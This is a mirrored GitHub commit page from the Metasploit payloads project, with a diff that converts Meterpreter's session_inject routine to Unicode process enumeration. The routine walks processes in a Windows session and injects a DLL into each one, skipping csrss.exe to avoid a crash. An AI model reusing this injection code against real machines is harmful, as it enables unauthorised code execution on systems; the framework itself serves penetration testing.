github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-30 22:19:17 +02:00
Code Releases Activity

Process Unicode support

Browse Source
This commit is contained in:
cn-kali-team 2020-04-05 11:52:08 +08:00
parent 348aa69f68
commit a8df9b3604
1 changed files with 10 additions and 10 deletions

20
c/meterpreter/source/extensions/stdapi/server/sys/session.c

@ -114,13 +114,13 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
{ {
DWORD dwResult = ERROR_INVALID_HANDLE; DWORD dwResult = ERROR_INVALID_HANDLE;
CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL; CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL;
PROCESS32FIRST pProcess32First = NULL; PROCESS32FIRSTW pProcess32FirstW = NULL;
PROCESS32NEXT pProcess32Next = NULL; PROCESS32NEXTW pProcess32NextW = NULL;
HANDLE hProcessSnap = NULL; HANDLE hProcessSnap = NULL;
HMODULE hKernel = NULL; HMODULE hKernel = NULL;
HANDLE hToken = NULL; HANDLE hToken = NULL;
BOOL bUseBruteForce = TRUE; BOOL bUseBruteForce = TRUE;
PROCESSENTRY32 pe32 = {0}; PROCESSENTRY32W pe32 = {0};
do do
{ {
@ -146,19 +146,19 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
break; break;
pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" ); pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" );
pProcess32First = (PROCESS32FIRST)GetProcAddress( hKernel, "Process32First" ); pProcess32FirstW = (PROCESS32FIRSTW)GetProcAddress( hKernel, "Process32FirstW" );
pProcess32Next = (PROCESS32NEXT)GetProcAddress( hKernel, "Process32Next" ); pProcess32NextW = (PROCESS32NEXTW)GetProcAddress( hKernel, "Process32NextW" );
if( !pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next ) if( !pCreateToolhelp32Snapshot || !pProcess32FirstW || !pProcess32NextW )
break; break;
hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE ) if( hProcessSnap == INVALID_HANDLE_VALUE )
break; break;
pe32.dwSize = sizeof( PROCESSENTRY32 ); pe32.dwSize = sizeof( PROCESSENTRY32W );
if( !pProcess32First( hProcessSnap, &pe32 ) ) if( !pProcess32FirstW( hProcessSnap, &pe32 ) )
break; break;
bUseBruteForce = FALSE; bUseBruteForce = FALSE;
@ -169,7 +169,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
{ {
// On Windows 2008R2 we Blue Screen the box if we inject via APC injection // On Windows 2008R2 we Blue Screen the box if we inject via APC injection
// into the target sessions instance of csrss.exe!!! so we filter it out... // into the target sessions instance of csrss.exe!!! so we filter it out...
if( strstr( pe32.szExeFile, "csrss.exe" ) ) if (wcsstr(pe32.szExeFile, L"csrss.exe"))
continue; continue;
dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer, cpCommandLine ); dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer, cpCommandLine );
@ -179,7 +179,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
break; break;
} }
} }
} while( pProcess32Next( hProcessSnap, &pe32 ) ); } while( pProcess32NextW( hProcessSnap, &pe32 ) );
} while( 0 ); } while( 0 );